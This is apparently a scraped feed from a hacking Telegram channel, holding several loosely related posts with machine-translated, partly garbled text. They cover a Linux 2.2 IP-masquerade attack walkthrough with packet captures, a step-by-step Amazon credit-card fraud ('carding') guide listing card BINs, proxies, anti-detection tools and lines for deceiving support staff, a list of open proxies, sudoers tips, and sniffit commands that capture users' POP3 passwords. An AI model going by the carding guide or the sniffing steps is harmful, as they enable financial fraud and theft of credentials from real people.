UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
---- System Security Scanner (S3) from ISS is a security assessment tool that facilitates the management and implementation of security policies. It enables companies to implement security policies across heterogeneous operating platforms. Currently, S3 supports most popular UNIX versions, including Linux, SunOS4.1.3, Solaris, HP-UX, and AIX. It helps companies to automatically conduct security assessment and maintenance on their operating system platforms. With this effective tool, companies can make full use of the potential of the network and continuously enhance their competitivenessβ€”without worrying about security.

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ SECURITY KERNEL TIPS BY UNDERCODE :
FB.com/undercodeTesting

πŸ¦‘π•ƒπ”Όπ•‹' π•Š π•Šπ•‹π”Έβ„π•‹

1) kernel IP camouflage has security holes
There are serious security holes in the implementation of IP disguise of Linux system 2.2.x kernel. There is a lack of serious inspection of the connection in the relevant core code. The attacker can rewrite the UDP disguise entry in the core so that the attacker's UDP packet can be routed into the internal machine.

2) When an internal IP wants to access the DNS server of the external network, when the sent UDP packet passes through the IP masquerading gateway, the kernel adds an entry to record the connection. For example, a UDP packet connected from port 1035 of internal host A to port 53 of external host C. The kernel replaces the source address of this packet with the IP of the disguised gateway (B). Port, the default is from 61000 port to 65096 port, so in theory, the core can handle 4096 TCP / UDP camouflage connections at the same time.

Host A: 1035-> GW B: 63767-> Host C: 53When

3) an external network sends a UDP packet to a disguised gateway, Linux IP disguise only decides whether this UDP packet should be forwarded to the internal network based on the target port. If the target port has a corresponding entry in the established camouflage connection table, it will update the source ip and source port in this packet to the remote host ip and port of the corresponding entry. As long as the attacker judges the port of the masquerading gateway, he may use his own IP and port to rewrite the masquerading connection table. The port range used by the masquerade gateway to serve masquerade connections is usually from 61000 to 65096, so it is easy for external attackers to determine which ports have been used to establish connections. An attacker can send UDP detection packets to these ports disguised as a gateway, and then check the IP ID of the port's ICMP response packets. Each host sends a packet, the IP ID in its TCP / IP stack will increase by one. Therefore, the ICMP response sent to the port used for IP masquerading will have the IP ID of the internal host.

4) This ID will usually be much different from the current IP ID of the gateway host, usually above 1000. The following example shows the process of exploiting weaknesses:

πŸ¦‘Host A is an internal host (192.168.1.100)

Host B is a disguised gateway (192.168.1.1 / 10.0.0.1)

Host C is an external DNS server (10.0.0.25).

Host X is an external attacker's IP (10.10.187.13)

. Before the detection, execute the command written by undercode in the disguised gateway: ipchains -L -M -n to display the current disguised connection table Situation:

> UDP 03: 39.21 192.168.1.100 10.0.0.25 1035 (63767)-> 53

is currently a connection sent from port 1035 of 192.168.1.100 to port 53 of 10.0.0.25, the masquerading port is 63767

[from the attacker ’s The result of tcpdump on the machine]

(To make it easier to see the problem, here we set the source port of all detection packets to 12345)

[Our detection will start from port 61000, we omitted some of the previous results]

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)

10.10.187.13.12345> 10.0.0.1.63763: udp 0 (DF) [tos 0x18] ( ttl 254, id 23069)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)

10.10.187.13.12345> 10.0.0.1.63764: udp 0 (DF ) [tos 0x18] (ttl 254, id 23070)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)

10.10.187.13.12345> 10.0.0.1.63765: udp 0 (DF) [tos 0x18] ( ttl 254, id 23071)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)

10.10.187.13.12345> 10.0.0.1.63766: udp 0 (DF ) [tos 0x18] (ttl 254, id 23074)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)

10.10.187.13.12345> 10.0.0.1. 63 767: 0 UDP (the DF) [TOS 0x18] (TTL 254, ID 23083)
10.0.0.1> 10.10.187.13: ICMP: 10.0.0.1 unreachable The UDP Port 63767 [TOS 0xD8] (TTL 244, ID 17205)

^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^

The ID of the above package is 17205, and its difference from 13139 has exceeded 4000, which means that we found a pretended connection. !!!

10.10.187.13.12345> 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140)

10.10.187.13.12345> 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id 23088)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos 0xd8] (ttl 245, id 13141)

10.10.187.13.12345> 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id 23090)

10.0.0.1> 10.10.187.13 : icmp: 10.0.0.1 udp port 63770 unreachable [tos 0xd8] (ttl 245, id

13142 ) 10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23091)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos 0xd8] (ttl 245, id 13143)

10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] ( ttl 254, id 23092)

10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos 0xd8] (ttl 245, id 13144)

[our detected end of port 65096, we have omitted some results]

now Let's check the situation of the masquerading connection table of the masquerading gateway:

ipchains -L -M -n

> UDP 04: 35.12 192.168.1.100 10.10.187.13 1035 (63767)-> 12345

You can see that the remote host has been replaced by an attack The ip of the attacker is 10.10.187.13, and the target port is also replaced by the source port used for attacker detection: 12345.

Now the attacker can send UDP data from the source port 12345 to port 1035 of the internal host.


πŸ¦‘Suggestion:

A possible solution to the problem of accessing external DNS is to set it on a disguised gateway A cached domain name server, and then prohibit the disguise of UDP packets.

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ SECURITY KERNEL FULL TIPS BY UNDERCODE
T.me/UndercodeTesting
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘AMAZON NEW CARDING METHOD WORKS 100%How to Card Amazon :

πŸ¦‘π•ƒπ”Όπ•‹' π•Š π•Šπ•‹π”Έβ„π•‹

πŸ¦‘ Method 1
Things you will need:
Quality CC/CVV to an address, full name, phone number, zip code, city, and
state (don’t get junk cards pay good money for good cards)
Socks 4/5 to the state and if you can the city since that would be perfect. This
sock must have never been used before so don’t be cheap and get a quality
sock. Socks are just as important as quality cards!
You will need programs to cleanup cookies and other flagging shit. Get
CCleaner- get the free version it has everything you need. Get the flash cookie
cleaner- it is free as well
Antidetect 7 or Fraudfox VM: These are not needed but they really increase
your carding success to almost 100% if used correctly and setup properly which
both are not very hard to do.
A drop address or if you’re carding digital items you don’t need that.
OK now let’s card
-------------------------X---------------------------------
You just need a Diners Club international cc, Indian NON-VBV
or AMEX, Some Amex are still working
I’m listing some bins here which will work on Amazon.
542034542034 IN MASTERCARD CREDIT BANK OF INDIA
542086 IN MASTERCARD CREDIT ANDHRA BANK
376900 IN AMEX CREDIT AMERICAN EXPRESS
376901 IN AMEX CREDIT AMERICAN EXPRESS
376902 IN AMEX CREDIT AMERI EXPRESS
376903 IN AMEX CREDIT AMERI EXPRESS
#All are Non-VBV

πŸ¦‘ First Method (Most successful)
Restart the computer and make sure you have used ccleaner and flash cookie
cleaner and they are running. Used disk cleanup in windows as well.
Create a new account on Amazon using a fresh good socks. Modern protection
against carding tracks the user's behavior on the site. Therefore, you must act as
a typical buyer, not jump directly to your product. Use the search, see different
knick-knacks, add them to the cart, but do not buy. It should be quite different
items, not those that you want to card.
After the virtual shopping logout from Amazon, leave the computer, and stop
the activity on it. Put it to sleep. After 5 or more hours, go back to Amazon and
clean your cart. Now let’s card.
Now find the items falling into the limit of your card somewhere between $30
and $150. Using a credit card, pay for the goods that you selected. You may need
to wait for amazon to approve your order or not. Sometimes it’s random I swear.
Now the order should have been accepted and shipped. If not, then you either
have a shitty card worth less than what you trying to card or you threw a flag. Go
back and check your setup. This is pretty full proof way to card amazon. If
everything is in place and you have your bases covered, you should be in and
out. Make sure you check to see if you IP leaking cause that would throw a flag
as well: https://www.dnsleaktest.com
Now we can also speed up this order if it’s in processing just so it doesn’t get
charged back and flagged before it gets shipped. Send amazon an email from
the email that you created for this account. Gmail is preferred email for this setup
as it is much more trustworthy do to its security signed up measures. Use an
excuse to make them speed it up. There is excuse kind of tie into what you are
buying. So let’s say you want a 800 dollar cannon camera then tell them that you
need it for β€” day for your college project or you will fail the class etc. Don’t forgetit’s real person on the other end so make your excuse real and don’t go too in
depth.
Now they may ask to call you on the phone number associated with the CC
account. This happens maybe 30% of the time. Just say OK and hope no one
picks up the phone on the other end and luck I on your side. If they send you
another email saying they tried to contact, you but no answer then simply say- β€œI
am so sorry I changed my number and I haven’t update it with my CC company
yet” then give them a burner number where you can actually answer.
Now if all goes smooth then you have carded your first real item on Amazon.
Now that you have done that your account is trusted and you can place an order
between $500-$800 or until the card is maxed out. Stay below $2000 per order.
πŸ¦‘ Max the card out as quick as you can but be inconspicuous and act like a real
buyer. The security for the most part are bots and the formulas they use are really
intense so when I say act like a real buyer I mean that or you will get limited and
blocked.
Just understand that these methods work 90% of the time and the majority of the
success of carding I on the carder himself and the setup he has. With Antidetect
or Fraudfox the carding success is closer to 95%. Amazon, eBay, and PayPal are
getting harder and harder to card and fraud every day and pretty soon it won’t
be possible so understand that you need to have everything in tip top setup and
stay ahead of bots.

@UndercodeOfficial
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ full amazon carding- don t use for steal !!

t.me/undercodeTesting
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘FRESH PREMIUM PROXIES LAST LIST :

103.252.117.230 3128 1 hour ago
2410 ms 20% (55) in India - Tiruchi Elite -
3.22.47.81 8080 1 hour ago
4567 ms 5% (67) us United States - Columbus Elite -
68.183.208.248 80 1 hour ago
571 ms 23% (58) de Germany - Frankfurt am Main Elite -
80.241.222.138 80 1 hour ago
722 ms 100% (43) de Germany - Munich Elite -
79.115.245.227 8080 1 hour ago
3621 ms 17% (65) ro Romania - Oradea Elite -
180.252.181.3 80 1 hour ago
1167 ms 100% (45) id Indonesia - Samarinda Elite -
178.62.246.180 3128 1 hour ago
2963 ms 13% (58) nl Netherlands - Amsterdam Elite -
192.34.62.163 3128 1 hour ago
3034 ms 12% (61) us United States - North Bergen Elite -
188.40.183.187 1080 1 hour ago
1996 ms 77% (42) de Germany Elite -
109.172.43.35 3129 1 hour ago
4269 ms 39% (49) ru Russia - Lipetsk Elite -
144.217.101.242 3129 1 hour ago
754 ms 82% (38) ca Canada Elite -
173.192.128.238 25 1 hour ago
146 ms 100% (42) us United States - Seattle Elite -
36.91.58.207 8080 1 hour ago
4193 ms 8% (63) id Indonesia Elite -
60.205.132.71 80 1 hour ago
1576 ms 18% (57) cn China - Hangzhou Elite -
80.241.222.137 80 1 hour ago
763 ms 95% (37) de Germany - Munich Elite -
85.10.219.98 1080 1 hour ago
3843 ms 43% (64) de Germany Elite -
78.41.174.198 8081 1 hour ago
3689 ms 10% (63) sk Slovakia - Dunajska Luzna Elite -
88.99.10.248 1080 1 hour ago
1245 ms 61% (38) de Germany Elite -
148.251.153.6 1080 1 hour ago
1012 ms 63% (53) de Germany Elite -
159.8.114.37 8123 1 hour ago
334 ms 98% (35) fr France - Clichy Elite -
47.90.54.45 8080 1 hour ago
2077 ms 43% (56) hk Hong Kong Elite -
35.200.179.207 8118 1 hour ago
1025 ms 2% (73) us United States Elite -
39.137.69.10 8080 1 hour ago
2843 ms 20% (57) cn China Elite -

@UNDERCODETESTING
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Proxy Anonymity Levels Explained :


> ) A more detailed explanation about the specifics can be found proxy levels explained page, but the basic behavior of each proxy level goes like this:

1) Transparent - target server knows your IP address and it knows that you are connecting via a proxy server.

2) Anonymous - target server does not know your IP address, but it knows that you're using a proxy.

3) Elite - target server does not know your IP address, or that the request is relayed through a proxy server.

πŸ¦‘ How to use Proxy Servers?

1) Almost any application, such as your own web-browser, can be configured to route your connections through a proxy server for reasons of anonimity or performance.

2) Configuring your browser to use a proxy server is quick and easy, and the instructions for doing that are described in our articles section.

3) However, the recommended alternative to doing all those steps anytime you wish to use a different proxy, is to use our homemade proxy switcher that can simplify the whole process to just a few mouse clicks.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ¦‘more security tips by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁


πŸ¦‘ Introduction of commonly used Linux network security tools


1) γ€€γ€€Although various versions of Linux distribution comes with a lot of free open-source software, but there are still a large number of useful tools are not default.
γ€€
2) γ€€Included in their installation CDs, there are in particular toolkits that can enhance Linux network security, and most of them are also open source free software.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘γ€€security tips :
instagram.com/undercodeTesting

1) Execute #rpm -ivh sudo * to install, then edit / etc / sudoers file with / usr / sbin / visudo.

2) If the system prompts that you cannot find / usr / bin / vi but you actually have the vi program in the directory / bin, you need
ln -sf / bin / vi / usr / bin / vi creates symbolic links under / usr / bin for vi. (Note: I met on Redhat 6.1, there is no problem on Redhat 5.x)
γ€€γ€€
3) Also, if some other error occurs, you may also need #chmod 700 / var / run / sudo

Here is my / etc / sudoers File example:
[root @ sh-proxy / etc] # more sudoers
Host_Alias ​​SERVER = sh-proxy

# User alias specification

User_Alias ​​ADMIN = jephe, tome

# Cmnd alias specification

Cmnd_Alias ​​SHUTDOWN = / etc / halt, / etc / shutdown, / etc / reboot

πŸ¦‘ADMIN SERVER = SHUTDOWN
jephe SERVER = / usr / bin / tail -f / var / log / maillog
jephe SERVER = / usr / bin / tail -f / var / log / messages

# User privilege specification
root ALL = (ALL) ALL
-----------

πŸ¦‘ γ€€Since I often need to log in to the server remotely to observe the changes in the email log file / var / log / maillog, so I added this line to / etc / sudoers, so that I do n’t need to log in frequently as root to complete my daily work, improved safety.


written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Sniffit :


1) sniffit is a well-known network port detector, you can configure it to run in the background to detect which Tcp / ip port user input / output information.

2) The most commonly used function is that an attacker can use it to detect the data transmission on your 23 (telnet) and 110 (pop3) ports to easily get your login password and mail account password. Sniffit is basically used by vandals.

3) Tools, but since you want to know how to enhance the security of your site, first of all you should know the various tools used by intruders.


4) The homepage of sniffit can be downloaded from git , the installation is very easy, just run #tar xvfz sniff * solution in the root directory Open all files to the corresponding directory.

5) You can run sniffit -i to view all input / output information on the specified network interface in an interactive graphical interface.

πŸ¦‘For example: in order to get the pop3 account and password entered by all users when they receive mail through a certain interface abcd, you can run
#sniffit -p 110 -t abcd &
#sniffit -p 110 -s abcd &
record files in the directory / usr / doc / sniffit * below:

6) The log file is named according to the visitor's IP address, random high-end port number, and the network interface IP address and detection port used for detection. It takes advantage of the inherent weakness of the tcp / ip protocol, because the user name and password information transmitted by ordinary telnet and pop3 are plain text, without any encryption.

7) So for telnet / ftp. You can use ssh / scp instead. The ssh / scp information detected by sniffit is basically a bunch of garbled characters, so you do n’t need to worry about the username and password information sent by ssh being stolen by a third party.

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁